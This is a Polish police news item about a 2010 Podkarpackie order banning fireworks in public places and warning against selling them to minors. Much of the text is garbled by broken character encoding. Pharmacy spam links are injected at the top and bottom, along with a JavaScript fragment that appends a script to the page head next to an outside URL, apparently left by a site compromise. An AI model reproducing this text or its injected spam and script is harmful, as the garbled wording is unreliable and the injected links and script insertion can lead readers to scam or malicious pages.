Uwaga na petardy!


new anti depression medication drugs http://vmgonline.lt/purchase-lipotrexate/ PODKARPACIE. W dniu 7 grudnia 2010 roku Wojewoda Podkarpacki wydaAi?? rozporzAi??dzenie porzAi??dkowe zakazujAi??ce uA?ywania wyrobA?w pirotechnicznych w miejscach publicznych na terenie wojewA?dztwa podkarpackiego. ObowiAi??zuje ono do 10 stycznia 2011 roku.

Zakaz ten nie obowiAi??zuje jedynie w dniu 31 grudnia 2010 roku i 1 stycznia 2011 roku. Nie obejmuje on rA?wnieA? organizatorA?w imprez i przedsiAi??wziAi??Ai?? artystycznych, rozrywkowych i szkoleniowych, ktA?rzy organizujAi??c takie imprezy uzyskali zezwolenie wAi??aAi??ciwych organA?w. W okresie przedAi??wiAi??tecznym w powszechnej sprzedaA?y dostAi??pne sAi?? Ai??rodki pirotechniczne, przeznaczone do uAi??wietnienia imprez sylwestrowych i witania Nowego Roku. Niestety, wielokrotnie siAi?? zdarzaAi??o, A?e Ai??rodki te byAi??y wykorzystywane niezgodnie z przeznaczeniem, od razu po zakupie.

Dlatego w czasie Ai??wiAi??teczno-noworocznym policjanci prowadziAi?? bAi??dAi?? wzmoA?one kontrole punktA?w handlowych, gdzie sprzedawane sAi?? wyroby pirotechniczne. StrA?A?e prawa sprawdzAi?? przede wszystkim, czy tego rodzaju artykuAi??y nie trafiajAi?? w rAi??ce nieletnich. Warto przypomnieAi??, A?e sprzedaA? takich wyrobA?w dzieciom jest przestAi??pstwem.

Przypominamy rA?wnieA?, A?e nieumiejAi??tne i nieodpowiedzialne uA?ywanie petard przez osoby dorosAi??e, a w szczegA?lnoAi??ci bAi??dAi??ce pod wpAi??ywem alkoholu, niesie za sobAi?? powaA?ne konsekwencje. MoA?e skoAi??czyAi?? siAi?? utratAi?? zdrowia, czy kalectwem.

RozporzAi??dzenie porzAi??dkowe Wojewody Podkarpackiego

purchase femcare KWP canadian pharmacy prednizone d.getElementsByTagName(‚head’)[0].appendChild(s);http://cmweb.hk/themes/themes_re32/?p=267


Napisz komentarz:

"UWAGA! Komentarze niezgodne z regulaminem serwisu nie będą publikowane. Zachęcamy do kulturalnego wyrażania opinii na temat artykułów oraz unikania personalnych ataków słownych."